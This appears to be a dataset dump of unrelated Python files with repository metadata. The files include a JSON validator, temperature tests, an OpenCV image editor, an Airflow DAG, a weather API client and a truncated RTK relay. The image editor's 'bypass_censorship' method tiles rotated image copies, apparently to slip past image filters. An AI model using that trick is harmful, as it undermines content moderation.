'''Convert a formatted basis set file to another format
Parameters
----------
file_path_in : str
Path to the file to be read
file_path_out : str
Path to the file to be written.
in_fmt : str
The format of the basis to be read. If None, it is detected from the file name
out_fmt : str
The format of the basis to be written. If None, it is detected from the file name
encoding : str
The encoding of the input file
Returns
-------
str
The basis set as a str with the new format
'''
basis_dict = read_formatted_basis_file(file_path_in,
basis_fmt=in_fmt,
encoding=encoding,
validate=True,
as_component=False)
if make_gen:
basis_dict = make_general(basis_dict, use_copy=False)
write_formatted_basis_file(basis_dict, file_path_out, basis_fmt=out_fmt)
| 0.980469
| 1
|
validate/utils.py
|
oguzhanunlu/validate_json
| 0
|
12782872
|
# -*- coding: utf-8 -*-
import jsonschema
import sys
def clean_doc(doc):
"""
Clean given JSON document from keys where its value is None
:param doc: Pure, dirty JSON
:return: Cleaned JSON document
"""
for key, value in list(doc.items()):
if value is None:
del doc[key]
elif isinstance(value, dict):
clean_doc(value)
return doc
def is_valid(doc, schema):
"""
Checks if given doc is valid against given schema
:param doc: to be validated JSON
:param schema: base JSON
:return: a boolean result and error
"""
try:
jsonschema.validate(doc, schema)
sys.stdout.write("OK\n")
return True, None
except jsonschema.exceptions.ValidationError as val_err:
sys.stderr.write("FAIL\n")
return False, val_err
| 2.953125
| 3
|
tests/test_degrees.py
|
thierrydecker/siarnaq
| 0
|
12782873
|
<reponame>thierrydecker/siarnaq
"""Degrees tests module.
Copyright (c) 2020 <NAME>
All Rights Reserved.
Released under the MIT license
"""
import pytest
from siarnaq.degrees import Degree
def test_instanciations():
assert isinstance(Degree(), Degree)
assert isinstance(Degree('ce'), Degree)
assert isinstance(Degree('fa'), Degree)
assert isinstance(Degree('ke'), Degree)
assert isinstance(Degree('ra'), Degree)
assert isinstance(Degree(temp=10), Degree)
assert isinstance(Degree(scale='ce'), Degree)
assert isinstance(Degree(scale='fa'), Degree)
assert isinstance(Degree(scale='ke'), Degree)
assert isinstance(Degree(scale='ra'), Degree)
assert isinstance(Degree(scale='ce', temp=0), Degree)
assert isinstance(Degree(scale='fa', temp=0), Degree)
assert isinstance(Degree(scale='ke', temp=0), Degree)
assert isinstance(Degree(scale='ra', temp=0), Degree)
with pytest.raises(Exception):
assert Degree(scale='Dummy')
with pytest.raises(Exception):
assert Degree(temp='Dummy')
with pytest.raises(Exception):
assert Degree(scale='Dummy', temp='Dummy')
def test_static_methods():
assert round(Degree.conv_ce_to_fa(temp=0), 2) == 32.00
assert round(Degree.conv_ce_to_ke(temp=0), 2) == 273.15
assert round(Degree.conv_ce_to_ra(temp=0), 2) == 491.67
assert round(Degree.conv_fa_to_ce(temp=32), 2) == 0.00
assert round(Degree.conv_fa_to_ke(temp=32), 2) == 273.15
assert round(Degree.conv_fa_to_ra(temp=32), 2) == 491.67
assert round(Degree.conv_ke_to_ce(temp=0), 2) == -273.15
assert round(Degree.conv_ke_to_fa(temp=273.15), 2) == 32.00
assert round(Degree.conv_ke_to_ra(temp=100), 2) == 180
assert round(Degree.conv_ra_to_ce(temp=100), 2) == -217.59
assert round(Degree.conv_ra_to_fa(temp=100), 2) == -359.67
assert round(Degree.conv_ra_to_ke(temp=100), 2) == 55.56
def test_propertties_getters():
assert Degree().scales == {'ce', 'fa', 'ke', 'ra'}
r = Degree(scale='ce', temp=0)
assert r.scale == 'ce'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == 0.00
assert round(r.fahrenheit, 2) == 32.00
assert round(r.kelvin, 2) == 273.15
assert round(r.rankine, 2) == 491.67
r = Degree(scale='fa', temp=0)
assert r.scale == 'fa'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == -17.78
assert round(r.fahrenheit, 2) == 0
assert round(r.kelvin, 2) == 255.37
assert round(r.rankine, 2) == 459.67
r = Degree(scale='ke', temp=0)
assert r.scale == 'ke'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0
assert round(r.rankine, 2) == 0
r = Degree(scale='ra', temp=0)
assert r.scale == 'ra'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0
assert round(r.rankine, 2) == 0
def test_propertties_setters():
#
# From 'ce' to 'fa'
#
r = Degree(scale='ce', temp=0)
r.scale = 'fa'
assert round(r.temp, 2) == 32.00
assert round(r.celcius, 2) == 0
assert round(r.fahrenheit, 2) == 32.00
assert round(r.kelvin, 2) == 273.15
assert round(r.rankine, 2) == 491.67
#
# From 'ce' to 'ke'
#
r = Degree(scale='ce', temp=0)
r.scale = 'ke'
assert round(r.temp, 2) == 273.15
assert round(r.celcius, 2) == 0.00
assert round(r.fahrenheit, 2) == 32.00
assert round(r.kelvin, 2) == 273.15
assert round(r.rankine, 2) == 491.67
#
# From 'ce' to 'ra'
#
r = Degree(scale='ce', temp=0)
r.scale = 'ra'
assert round(r.temp, 2) == 491.67
assert round(r.celcius, 2) == 0.00
assert round(r.fahrenheit, 2) == 32.00
assert round(r.kelvin, 2) == 273.15
assert round(r.rankine, 2) == 491.67
#
# From 'fa' to 'ce'
#
r = Degree(scale='fa', temp=0)
r.scale = 'ce'
assert round(r.temp, 2) == -17.78
assert round(r.celcius, 2) == -17.78
assert round(r.fahrenheit, 2) == 0.00
assert round(r.kelvin, 2) == 255.37
assert round(r.rankine, 2) == 459.67
#
# From 'fa' to 'ke'
#
r = Degree(scale='fa', temp=0)
r.scale = 'ke'
assert round(r.temp, 2) == 255.37
assert round(r.celcius, 2) == -17.78
assert round(r.fahrenheit, 2) == 0.00
assert round(r.kelvin, 2) == 255.37
assert round(r.rankine, 2) == 459.67
#
# From 'fa' to 'ra'
#
r = Degree(scale='fa', temp=0)
r.scale = 'ra'
assert round(r.temp, 2) == 459.67
assert round(r.celcius, 2) == -17.78
assert round(r.fahrenheit, 2) == 0.00
assert round(r.kelvin, 2) == 255.37
assert round(r.rankine, 2) == 459.67
#
# From 'ke' to 'ce'
#
r = Degree(scale='ke', temp=0)
r.scale = 'ce'
assert round(r.temp, 2) == -273.15
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
#
# From 'ke' to 'fa'
#
r = Degree(scale='ke', temp=0)
r.scale = 'fa'
assert round(r.temp, 2) == -459.67
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
#
# From 'ke' to 'ra'
#
r = Degree(scale='ke', temp=0)
r.scale = 'ra'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
#
# From 'ra' to 'ce'
#
r = Degree(scale='ra', temp=0)
r.scale = 'ce'
assert round(r.temp, 2) == -273.15
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
#
# From 'ra' to 'fa'
#
r = Degree(scale='ra', temp=0)
r.scale = 'fa'
assert round(r.temp, 2) == -459.67
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
#
# From 'ra' to 'ke'
#
r = Degree(scale='ra', temp=0)
r.scale = 'ke'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
with pytest.raises(Exception):
r = Degree()
r.scale = 'Dummy'
def test_add():
r1 = Degree(scale='ce', temp=1.0)
r2 = Degree(scale='ce', temp=20.0)
r = r1 + r2
assert r.scale == 'ce'
assert r.temp == 21.00
r1 = Degree(scale='fa', temp=1.0)
r2 = Degree(scale='fa', temp=2.0)
r = r1 + r2
assert r.scale == 'fa'
assert r.temp == 3.00
r1 = Degree(scale='fa', temp=1.0)
r = r1 + 2.00
assert r.scale == 'fa'
assert r.temp == 3.00
r1 = Degree(scale='ke', temp=1.0)
r = 2.00 + r1
assert r.scale == 'ke'
assert r.temp == 3.00
r1 = Degree(scale='ce', temp=1.0)
r2 = Degree(scale='ce', temp=1.0)
r1 += r2
assert r1.scale == 'ce'
assert r1.temp == 2.00
r1 = Degree(scale='ce', temp=0.0)
r2 = Degree(scale='ke', temp=0.0)
r1 += r2
assert r1.scale == 'ce'
assert r1.temp == -273.15
r1 = Degree(scale='ra', temp=0.0)
r2 = Degree(scale='ke', temp=0.0)
r1 += r2
assert r1.scale == 'ra'
assert r1.temp == 0.00
r1 = Degree(scale='ke', temp=0.0)
r2 = Degree(scale='ra', temp=0.0)
r1 += r2
assert r1.scale == 'ke'
assert r1.temp == 0.00
def test_sub():
r1 = Degree(scale='ce', temp=1.0)
r2 = Degree(scale='ce', temp=2.0)
r = r1 - r2
assert r.scale == 'ce'
assert r.temp == -1.00
r1 = Degree(scale='fa', temp=1.0)
r = r1 - 2.00
assert r.scale == 'fa'
assert r.temp == -1.00
r1 = Degree(scale='ce', temp=1.0)
r2 = Degree(scale='ce', temp=1.0)
r1 -= r2
assert r1.scale == 'ce'
assert r1.temp == 0.00
r1 = Degree(scale='fa', temp=0.0)
r2 = Degree(scale='ce', temp=0.0)
r1 = r1 - r2
assert r1.scale == 'fa'
assert r1.temp == -32.00
r1 = Degree(scale='ke', temp=0.0)
r2 = Degree(scale='ra', temp=0.0)
r1 = r1 - r2
assert r1.scale == 'ke'
assert r1.temp == 0.00
r1 = Degree(scale='ra', temp=0.0)
r2 = Degree(scale='ke', temp=0.0)
r1 = r1 - r2
assert r1.scale == 'ra'
assert r1.temp == 0.00
def test_mul():
r1 = Degree(scale='ce', temp=2.0)
r = r1 * 10
assert r.scale == 'ce'
assert r.temp == 20.00
r1 = Degree(scale='fa', temp=2.0)
r = 20 * r1
assert r.scale == 'fa'
assert r.temp == 40.00
r1 = Degree(scale='ke', temp=2.0)
r = 20 * r1
assert r.scale == 'ke'
assert r.temp == 40.00
r1 = Degree(scale='ra', temp=20.0)
r = r1 * 2
assert r.scale == 'ra'
assert r.temp == 40.00
def test_div():
r1 = Degree(scale='ce', temp=2.0)
r = r1 / 10
assert r.scale == 'ce'
assert r.temp == 0.20
r1 = Degree(scale='fa', temp=10.0)
r = r1 / 10
assert r.scale == 'fa'
assert r.temp == 1.0
r1 = Degree(scale='ke', temp=5.0)
r = r1 / 2
assert r.scale == 'ke'
assert r.temp == 2.5
r1 = Degree(scale='ra', temp=10.0)
r = r1 / 2
assert r.scale == 'ra'
assert r.temp == 5.0
def test_str():
r = Degree('ce')
assert str(r) == '0.0 °C'
r.scale = 'fa'
r.temp = 0
assert str(r) == '0.0 °F'
r.scale = 'ke'
r.temp = 0
assert str(r) == '0.0 K'
r.scale = 'ra'
r.temp = 0
assert str(r) == '0.0 °Ra'
def test_repr():
r = Degree('ce')
assert repr(r) == 'Degree(\'ce\', 0.0)'
r.scale = 'fa'
r.temp = 0
assert repr(r) == 'Degree(\'fa\', 0.0)'
r.scale = 'ke'
r.temp = 0
assert repr(r) == 'Degree(\'ke\', 0.0)'
r.scale = 'ra'
r.temp = 0
assert repr(r) == 'Degree(\'ra\', 0.0)'
| 2.5
| 2
|
External/Objects.py
|
Occy88/TrainSimulator
| 0
|
12782874
|
import os
import json
cwd=os.getcwd()
weighted_graph_dict={}
stop_dict = {}
off_stop_dict={}
with open(cwd+'/WeightedGraph','r')as f:
line = True
while line:
line = f.readline()
if line:
data = json.loads(line)
weighted_graph_dict = data
exception_dict={}
with open(cwd+'/RouteData','r')as f:
line=True
while line:
line=f.readline()
print(line)
if line:
data=json.loads(line)
print(data)
with open(cwd+'/TrainLog','r')as f:
line=True
while line:
line=f.readline()
if line:
data=json.loads(line)
if not data['id'] in off_stop_dict:
off_stop_dict.update({data['id']:data['name']})
if not data['name'] in off_stop_dict:
train=data['train']
off_stop_dict.update({data['name']:{}})
elif len(data['train'])>0:
train=data['train']
if not train['id'] in off_stop_dict[data['name']]:
off_stop_dict[data['name']].update({train['id']:{}})
else:
stop=off_stop_dict[data['name']]
loc_train=stop[train['id']]
loc_train.update({data['time']:{'stop_list':train['stop_list'],'stop_index':train['stop_index']}})
# print("+++++++++++++++++++++++++++++++++++++++++++++++++++")
# with open(cwd + '/External/test', 'w')as f1:
# json.dump(off_stop_dict,f1)
# print("+++++++++++++++++++++++++++++++++++++++++++++++++++")
print(off_stop_dict['Bank'])
for stuff in off_stop_dict:
if off_stop_dict[stuff]=='Waterloo':
print(stuff)
"""
structure of data produced:
{
id:{
name: "full-name"
trips:{
money: "money-left"
trip_time: "hours-min-sec"
trip_cost: "cost"
trip_taken: "loctionA-locationB"
transits: [station1,station2,station3]
arrival_time: "time"
trains_taken: {
train Id:
{
Time: {
stop_list:[1,2,3]
stop_index: index
}
}
}
}
}
"""
"""
structure of dictionary:
{data
stopId:"stationName",
stopId2:"stationName2",
station_name: {
Train Id: {
Time1{
stop_list[n1,n2,n3]
stop_index: ind
}
}
},
station_name2: {
Train Id: {
Time1{
stop_list[n1,n2,n3]
stop_index: ind
}
}
},
}
"""
| 2.578125
| 3
|
sfn-log-export/src/functions/export_status_check/index.py
|
Domt301/serverless-patterns
| 883
|
12782875
|
<gh_stars>100-1000
import boto3
log_client = boto3.client('logs')
def handler(event, context):
task_id = event['taskId']
result = log_client.describe_export_tasks(taskId=task_id)
# per documentation, only one export can run at a time per account,
# therefore ensure none are running in this account
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/logs.html#CloudWatchLogs.Client.describe_export_tasks
# result = log_client.describe_export_tasks(statusCode='CANCELLED' | 'PENDING' | 'PENDING_CANCEL' | 'RUNNING')
status = 'RUNNING'
task_status = result.get('exportTasks')
if len(task_status) != 0:
task_status = task_status[0].get('status').get('code')
if task_status not in ['PENDING', 'PENDING_CANCEL', 'RUNNING']:
status = 'NOT_RUNNING'
return {"Status": status}
| 2.203125
| 2
|
scripts.py
|
packetsss/Image-Editor
| 6
|
12782876
|
# Create by Packetsss
# Personal use is allowed
# Commercial use is prohibited
import numpy as np
import cv2
from scipy import ndimage
import math
from copy import deepcopy
class Images:
def __init__(self, img):
self.img = cv2.imread(img, 1)
if self.img.shape[0] / self.img.shape[1] < 0.76:
self.img_width = 1100
self.img_height = int(self.img_width * self.img.shape[0] / self.img.shape[1])
else:
self.img_height = 700
self.img_width = int(self.img_height * self.img.shape[1] / self.img.shape[0])
self.img = cv2.resize(self.img, (self.img_width, self.img_height))
self.img_copy = deepcopy(self.img)
self.grand_img_copy = deepcopy(self.img)
self.img_name = img.split('\\')[-1].split(".")[0]
self.img_format = img.split('\\')[-1].split(".")[1]
self.left, self.right, self.top, self.bottom = None, None, None, None
# self.bypass_censorship()
def auto_contrast(self):
clip_hist_percent = 20
gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
hist = cv2.calcHist([gray], [0], None, [256], [0, 256])
hist_size = len(hist)
accumulator = [float(hist[0])]
for index in range(1, hist_size):
accumulator.append(accumulator[index - 1] + float(hist[index]))
maximum = accumulator[-1]
clip_hist_percent *= (maximum / 100.0)
clip_hist_percent /= 2.0
minimum_gray = 0
while accumulator[minimum_gray] < clip_hist_percent:
minimum_gray += 1
maximum_gray = hist_size - 1
while accumulator[maximum_gray] >= (maximum - clip_hist_percent):
maximum_gray -= 1
alpha = 255 / (maximum_gray - minimum_gray)
beta = -minimum_gray * alpha
self.img = cv2.convertScaleAbs(self.img, alpha=alpha, beta=beta)
def auto_sharpen(self):
self.img = cv2.detailEnhance(self.img, sigma_s=10, sigma_r=0.3)
def auto_cartoon(self, style=0):
edges1 = cv2.bitwise_not(cv2.Canny(self.img, 100, 200))
gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
gray = cv2.medianBlur(gray, 5)
edges2 = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 7, 7)
dst = cv2.edgePreservingFilter(self.img, flags=2, sigma_s=64, sigma_r=0.25)
if not style:
# less blurry
self.img = cv2.bitwise_and(dst, dst, mask=edges1)
else:
# more blurry
self.img = cv2.bitwise_and(dst, dst, mask=edges2)
def auto_invert(self):
self.img = cv2.bitwise_not(self.img)
def change_b_c(self, alpha=1, beta=0):
# contrast from 0 to 3, brightness from -100 to 100
self.img = cv2.convertScaleAbs(self.img, alpha=alpha, beta=beta)
def change_saturation(self, value):
# -300 to 300
img_hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV).astype("float32")
(h, s, v) = cv2.split(img_hsv)
s += value
s = np.clip(s, 0, 255)
img_hsv = cv2.merge([h, s, v])
self.img = cv2.cvtColor(img_hsv.astype("uint8"), cv2.COLOR_HSV2BGR)
def remove_color(self, color):
h = color.lstrip('#')
color = np.array([int(h[i:i + 2], 16) for i in (0, 2, 4)])
img_hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV).astype("float32")
low = np.array([color[0] - 15, 0, 20])
high = np.array([color[0] + 15, 255, 255])
mask = cv2.inRange(img_hsv, low, high)
img_hsv[mask > 0] = (0, 0, 255)
self.img = cv2.cvtColor(img_hsv.astype("uint8"), cv2.COLOR_HSV2BGR)
def crop_img(self, left, right, top, bottom):
self.img = self.img[left:right, top:bottom]
def rotate_img(self, angle, crop=False, flip=[False, False]):
self.reset(flip)
if not crop:
self.img = cv2.resize(self.img, (0, 0), fx=0.5, fy=0.5)
w, h = self.img.shape[1], self.img.shape[0]
else:
w, h = self.img_width, self.img_height
self.img = ndimage.rotate(self.img, angle)
angle = math.radians(angle)
quadrant = int(math.floor(angle / (math.pi / 2))) & 3
sign_alpha = angle if ((quadrant & 1) == 0) else math.pi - angle
alpha = (sign_alpha % math.pi + math.pi) % math.pi
bb_w = w * math.cos(alpha) + h * math.sin(alpha)
bb_h = w * math.sin(alpha) + h * math.cos(alpha)
gamma = math.atan2(bb_w, bb_w) if (w < h) else math.atan2(bb_w, bb_w)
delta = math.pi - alpha - gamma
length = h if (w < h) else w
d = length * math.cos(alpha)
a = d * math.sin(alpha) / math.sin(delta)
y = a * math.cos(gamma)
x = y * math.tan(gamma)
wr, hr = bb_w - 2 * x, bb_h - 2 * y
midpoint = (np.array(self.img.shape[:-1]) // 2)[::-1]
half_w, half_h = wr // 2, hr // 2
self.left, self.right, self.top, self.bottom = int(midpoint[0] - half_w), int(midpoint[0] + half_w), \
int(midpoint[1] - half_h), int(midpoint[1] + half_h)
def detect_face(self):
face_cascade = cv2.CascadeClassifier('data/haarcascade_frontalface_alt2.xml')
# eye_cascade = cv2.CascadeClassifier('data/haarcascade_eye.xml')
gray_scale_img = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
face_coord = face_cascade.detectMultiScale(gray_scale_img)
return face_coord
def bypass_censorship(self):
width = self.img.shape[1]
height = self.img.shape[0]
smaller_img = cv2.resize(self.img, (width // 2, height // 2))
image = np.zeros(self.img.shape, np.uint8)
try:
image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[height // 2:, :width // 2] = smaller_img
image[height // 2:, width // 2:] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[:height // 2, width // 2:] = smaller_img
except:
try:
image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[height // 2 + 1:, :width // 2] = smaller_img
image[height // 2 + 1:, width // 2:] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[:height // 2, width // 2:] = smaller_img
except:
image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[height // 2:, :width // 2] = smaller_img
image[height // 2:, width // 2 + 1:] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[:height // 2, width // 2 + 1:] = smaller_img
self.img = image
def save_img(self, file):
cv2.imwrite(file, self.img)
def reset(self, flip=None):
if flip is None:
flip = [False, False]
self.img = deepcopy(self.img_copy)
if flip[0]:
self.img = cv2.flip(self.img, 0)
if flip[1]:
self.img = cv2.flip(self.img, 1)
def grand_reset(self):
self.img = deepcopy(self.grand_img_copy)
self.img_copy = deepcopy(self.grand_img_copy)
def main():
path = "ppl.jpg"
img = Images(path)
img_name = path.split('\\')[-1].split(".")[0]
cv2.imshow(img_name, img.img)
cv2.waitKey()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
| 2.671875
| 3
|
apps/airflow/dags/dependent_dag.py
|
ceelo777/k8splayground
| 5
|
12782877
|
from airflow import DAG
from datetime import datetime, timedelta
from airflow.operators.bash_operator import BashOperator
from airflow.sensors.external_task_sensor import ExternalTaskSensor
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': datetime(2020, 6, 7),
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=1)
}
dag = DAG(
'dependent-dag',
default_args=default_args,
schedule_interval='*/5 * * * *',
catchup=False,
)
start = ExternalTaskSensor(
task_id='start-task',
external_dag_id='example-dag',
external_task_id='python-print',
execution_delta=timedelta(minutes=5),
timeout=3*60,
dag=dag,
)
curl = BashOperator(
bash_command=r"""curl -H "Content-Type: application/json" -d '{"status":"dependency successful", "time":"{{ ts }}"}' mock-server.default.svc.cluster.local""",
task_id="curl-task",
dag=dag,
)
curl.set_upstream(start)
| 2.234375
| 2
|
meteocat_api_client/xarxes/xema/mesurades.py
|
herrera-lu/meteocat-api-client
| 0
|
12782878
|
from typing import List
from ...excepcions import MeteocatLocalError
from ...helpers.utils import formateja_valors_data, neteja_diccionari, genera_info
class Mesurades:
def mesurades_x_1_variable_d_totes_estacions_o_1_estacio(
self, codi_variable: int, any: int, mes: int, dia: int, codi_estacio: str = None
) -> dict:
"""
Retorna informació d'una variable per a totes les estacions per una dia determinat, si s'informa el codi de la estació, retorna les dades de la variable per a l'estació sol·licitada.
Args:
codi_variable (int): Codi de la variable a consultar.
any (int): Any de consulta en format numèric YYYY.
mes (int): Mes de consulta en format numèric MM.
dia (int): Dia de consulta en format numèric DD. Per defecte None.
codi_estacio (str, optional): Codi de l'estació a consultar.
Returns:
dict: {
"codi": 32,
"lectures": [
{
"data": "2017-03-27T00:00Z",
"valor": 8.3,
"estat": "V",
"baseHoraria": "SH"
},
...
{
"data": "2017-03-27T23:30Z",
"valor": 8.5,
"estat": "V",
"baseHoraria": "SH"
}
]
}
"""
any, mes, dia = formateja_valors_data(any, mes, dia)
recurs = f"variables/mesurades/{codi_variable}/{any}/{mes}/{dia}"
if codi_estacio:
params = {"codi_estacio": codi_estacio}
else:
params = None
return self._aconsegueix(recurs, params)
def mesurades_x_totes_variables_d_1_estacio(
self, codi_estacio: str, any: int, mes: int, dia: int
) -> List[dict]:
"""
Retorna informació de totes les variables per una estació per una dia determinat.
Args:
codi_estacio (str): Codi de l'estació a consultar.
any (int): Any de consulta en format numèric YYYY.
mes (int): Mes de consulta en format numèric MM.
dia (int): Dia de consulta en format numèric DD.
Returns List[dict]: [
{
"codi": "CC",
"variables": [
{
"codi": 1,
"lectures": [
{
"data": "2020-06-16T00:00Z",
"dataExtrem": "2020-06-16T00:05Z",
"valor": 947.3,
"estat": "V",
"baseHoraria": "SH"
},
...
{
"codi": 30,
"lectures": [
{
"data": "2020-06-16T00:00Z",
"valor": 0.6,
"estat": "V",
"baseHoraria": "SH"
},
{
"data": "2020-06-16T00:30Z",
"valor": 0.6,
"estat": "V",
"baseHoraria": "SH"
},
...
{
"data": "2020-06-16T23:00Z",
"dataExtrem": "2020-06-16T23:00Z",
"valor": 0,
"estat": "V",
"baseHoraria": "SH"
},
{
"data": "2020-06-16T23:30Z",
"dataExtrem": "2020-06-16T23:30Z",
"valor": 0,
"estat": "V",
"baseHoraria": "SH"
}
]
}
]
}
]
"""
any, mes, dia = formateja_valors_data(any, mes, dia)
recurs = f"estacions/mesurades/{codi_estacio}/{any}/{mes}/{dia}"
return self._aconsegueix(recurs)
def mesurades_ultimes_dades_x_1_variable_d_totes_estacions_o_1_estacio(
self, codi_variable: int, codi_estacio: str = None
) -> dict:
"""
Retorna l'última mesura de les últimes 4 hores per totes les estacions d'una variable, filtrada per estació si així s'indica.
Args:
codi_variable (int): Codi de la variable a consultar.
codi_estacio (str, optional): Codi de l'estació a consultar. Per defecte None.
Returns:
dict: {
"codi": 5,
"lectures": [
{
"data": "2017-07-24T09:00Z",
"dataExtrem": "2017-07-24T09:00Z",
"valor": 24.7,
"estat": " ",
"baseHoraria": "SH"
}
]
}
"""
recurs = f"variables/mesurades/{codi_variable}/ultimes"
params = None
if codi_estacio:
params = {"codiEstacio": codi_estacio}
else:
params = None
return self._aconsegueix(recurs, params)
def mesurades_metadades_x_totes_variables_d_1_estacio(
self, codi_estacio: str, estat: str = None, data: str = None
) -> List[dict]:
# TODO: Utlitizar objecte datetime per la data.
"""
Retorna les metadades de totes les variables que mesura l'estació amb codi indicat a la URL, filtrades per estat i data si s'especifica.
Args:
codi_estacio (str): Codi identificatiu de l'estació meteorològica que es vol consultar.
estat (str, optional): Estat de l'estació. Possibles valors: [ope, des, bte]. Per defecte None.
data (str, optional): Codi identificatiu de l'estació meteorològica que es vol consultar. Per defecte None.
Raises:
MeteocatLocalError: Tracta localment errors en les peticions, abans d'executar la consulta a l'API del Meteocat.
Returns:
List[dict]: [
{
"codi": 3,
"nom": "Humitat relativa màxima",
"unitat": "%",
"acronim": "HRx",
"tipus": "DAT",
"decimals": 0,
"estats": [
{
"codi": 2,
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
],
"basesTemporals": [
{
"codi": "HO",
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
]
},
...
{
"codi": 72,
"nom": "Precipitació màxima en 1 minut",
"unitat": "mm",
"acronim": "PPTx1min",
"tipus": "DAT",
"decimals": 1,
"estats": [
{
"codi": 2,
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
],
"basesTemporals": [
{
"codi": "HO",
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
]
}
]
"""
recurs = f"estacions/{codi_estacio}/variables/mesurades/metadades"
# TODO: Refactoritzar creant funció utilitzable en tots els casos semblants a aquest.
params = None
if (estat and not data) or (not estat and data):
codi_error = 400
missatge_error = "Falta l'estat o la data"
params = neteja_diccionari(locals(), "self", "recurs")
info = genera_info(
self.__class__.__name__,
self.mesurades_metadades_x_totes_variables_d_1_estacio.__name__,
params,
)
raise MeteocatLocalError(codi_error, missatge_error, info)
else:
if estat and data:
params = neteja_diccionari(locals(), "self")
return self._aconsegueix(recurs, params)
def mesurades_metadades_x_1_variable_d_1_estacio(
self, codi_estacio: str, codi_variable: int
) -> dict:
"""
Retorna les metadades de la variable amb el codi indicat a la URL que mesura l'estació amb codi indicat a la URL.
Args:
codi_estacio (str): Codi identificatiu de l'estació meteorològica que es vol consultar.
codi_variable (int): Codi identificatiu de la variable que es vol consultar.
Returns:
dict: {
"codi": 3,
"nom": "Humitat relativa màxima",
"unitat": "%",
"acronim": "HRx",
"tipus": "DAT",
"decimals": 0,
"estats": [
{
"codi": 2,
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
],
"basesTemporals": [
{
"codi": "HO",
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
]
}
"""
recurs = (
f"estacions/{codi_estacio}/variables/mesurades/{codi_variable}/metadades"
)
return self._aconsegueix(recurs)
def mesurades_metadades_x_totes_variables(self) -> List[dict]:
"""
Retorna les metadades de totes les variables independement de les estacions en les que es mesurin.
Returns:
List[dict]: [
{
"codi": 1,
"nom": "Pressió atmosfèrica màxima",
"unitat": "hPa",
"acronim": "Px",
"tipus": "DAT",
"decimals": 1
},
...
{
"codi": 97,
"nom": "Temperatura superficial del mar",
"unitat": "°C",
"acronim": "TMAR",
"tipus": "DAT",
"decimals": 1
}
]
"""
recurs = "variables/mesurades/metadades"
return self._aconsegueix(recurs)
def mesurades_metadades_x_1_variable(self, codi_variable: int) -> dict:
"""
Retorna les metadades de la variable amb codi indicat a la URL, independement de les estacions en les que es mesurin.
Args:
codi_variable (int): Codi identificatiu de la variable que es vol consultar.
Returns:
dict: {
"codi": 1,
"nom": "Pressió atmosfèrica màxima",
"unitat": "hPa",
"acronim": "Px",
"tipus": "DAT",
"decimals": 1
}
"""
recurs = f"variables/mesurades/{codi_variable}/metadades"
return self._aconsegueix(recurs)
| 2.484375
| 2
|
dashboard/core/forms.py
|
hebergui/webtrade
| 0
|
12782879
|
<reponame>hebergui/webtrade
from django import forms
from .models import Employee
class EmployeeForm(forms.ModelForm):
class Meta:
model = Employee
fields = ('name', 'position', 'office', 'age', 'start_date', 'salary')
| 2.171875
| 2
|
production/rtk_trans.py
|
gautodev/pcb_production_test_server
| 0
|
12782880
|
<reponame>gautodev/pcb_production_test_server
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# File : production.py
# Author : bssthu
# Project : rtk_trans
# Description : socket 转发数据
#
import os
import sys
import json
import time
import signal
from production import log
from production.control_thread import ControlThread
from production.client_thread import ClientThread
from production.dispatcher_thread import DispatcherThread
from production.server_thread import ServerThread
from production.pcb_manager import PcbManager
class Rtk:
def __init__(self):
self.pcb_manager = PcbManager()
self.server = None
self.controller = None
self.dispatcher = None
self.client = None
self.is_interrupt = False
def got_data_cb(self, data, rcv_count):
"""接收到差分数据的回调函数
Args:
data: 收到的数据包
rcv_count: 收到的数据包的编号
"""
self.dispatcher.data_queue.put((data, rcv_count))
def got_client_cb(self, client_socket, address):
"""接受来自下层客户端的 socket 连接的回调函数
Args:
